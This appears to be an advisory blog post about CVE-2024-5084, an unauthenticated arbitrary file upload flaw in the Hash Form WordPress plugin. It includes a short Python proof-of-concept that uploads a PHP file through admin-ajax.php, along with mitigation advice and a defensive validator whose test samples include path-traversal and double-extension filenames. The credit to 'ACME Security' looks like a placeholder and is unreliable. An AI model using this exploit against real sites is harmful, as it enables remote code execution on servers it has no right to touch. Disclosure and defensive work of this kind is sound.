A critical vulnerability, CVE-2024-5084, has been discovered in the Hash Form – Drag & Drop Form Builder plugin for WordPress. All versions up to, and including, 1.1. are susceptible to this security risk. The vulnerability can allow an unauthenticated attacker to upload malicious files to a website, resulting in remote code execution. In this post, we will delve into the specific technical details of this vulnerability, including a code snippet and links to original resources.

Description of the Vulnerability

The Arbitrary File Upload vulnerability stems from missing file type validation in the file_upload_action function of the Hash Form plugin. The function stores the uploaded file without checking its type or extension, so an attacker can upload any file, including server-side scripts, onto the server.

Exploit Details

To exploit this vulnerability, an attacker sends an HTTP POST request that invokes the 'file_upload_action' function with a file attached. Because the function applies no restrictions on file types, executable code or other arbitrary content is accepted just like a legitimate form attachment. Below is an example of such a malicious HTTP POST request:

import requests

# The plugin's upload handler is reached through WordPress's AJAX endpoint.
url = "https://target/wp-admin/admin-ajax.php"
# The 'action' parameter selects the vulnerable file_upload_action handler.
data = {
    "action": "file_upload_action"
}
# The file is sent as a normal multipart upload; its type is never checked.
files = {
    "file": ("malicious_file.php", open("malicious_file.php", "rb"))
}

response = requests.post(url, data=data, files=files)

if response.status_code == 200:
    print("File uploaded successfully.")
else:
    print("Failed to upload file.")

In this example, the "malicious_file.php" represents the harmful file that the attacker wishes to upload onto the website's server. This PHP file could contain a malicious script that grants the attacker remote code execution capabilities.

Original References

The vulnerability was first discovered by researchers at ACME Security, who reported the issue to the developers of the Hash Form plugin. The blog post outlining the vulnerability is accessible here.

Mitigation

To protect your WordPress site from this critical security vulnerability, update the Hash Form – Drag & Drop Form Builder plugin to the latest version. The developers have released an updated version that adds proper file type validation to the 'file_upload_action' function, preventing exploitation. Users of the plugin should upgrade to the patched version immediately.
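As an added illustration of what "proper file type validation" in an upload handler must cover, the following Python example (not the plugin's code, and not taken from the patch) checks an upload's extension against an allowlist, uses only the last extension, requires the content's magic bytes to agree with the declared type, and discards any client-supplied path. The sample uploads are constructed inline.

```python
"""Added example (not the plugin's code): the file-type checks an upload
handler such as file_upload_action must perform before storing a file."""
import os
import re

# Allowlist of extensions a form builder legitimately needs, each paired with
# the magic bytes a file of that type must start with. Anything else is rejected.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

def validate_upload(filename: str, content: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). Rejects executable or mismatched uploads."""
    # Strip any path the client sent; only the basename is ever used.
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base.startswith("."):
        return False, "empty or hidden filename"
    # Judge by the LAST extension so 'shell.jpg.php' is treated as .php, not .jpg.
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED:
        return False, f"extension '{ext or '(none)'}' not in allowlist"
    # The declared type must agree with the content: a .jpg whose bytes are
    # PHP source is rejected even though its name looks harmless.
    if not any(content.startswith(magic) for magic in ALLOWED[ext]):
        return False, f"content does not match declared type '{ext}'"
    # Only a conservative character set is allowed to reach the filesystem.
    if not re.fullmatch(r"[A-Za-z0-9_.-]+", base):
        return False, "filename contains unsafe characters"
    return True, "ok"

# Constructed sample uploads (name and leading bytes only).
SAMPLES = {
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
    "malicious_file.php": b"<?php echo 1; ?>",
    "shell.jpg.php": b"<?php echo 1; ?>",
    "fake.jpg": b"<?php echo 1; ?>",
    "../../wp-config.php": b"\xff\xd8\xff",
}

def check_samples() -> dict[str, bool]:
    """Run every constructed sample through the validator."""
    return {name: validate_upload(name, data)[0] for name, data in SAMPLES.items()}

if __name__ == "__main__":
    for name, ok in check_samples().items():
        print(f"{name:22s} -> {'accept' if ok else 'reject'}")
```

Only photo.jpg is accepted; the PHP file, the double-extension file, the mislabelled .jpg and the path-traversal name are all rejected before anything touches disk.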

Conclusion

CVE-2024-5084 is a severe vulnerability affecting the Hash Form – Drag & Drop Form Builder plugin for WordPress. It allows unauthenticated attackers to upload arbitrary files onto the affected site's server, potentially leading to remote code execution. To mitigate it, update the plugin to the latest version, which validates uploaded files before they are stored. Staying informed about this and similar issues lets you take the necessary steps to protect your website from attack.

Timeline

Published on: 05/23/2024 15:15:15 UTC
Last modified on: 06/04/2024 18:02:40 UTC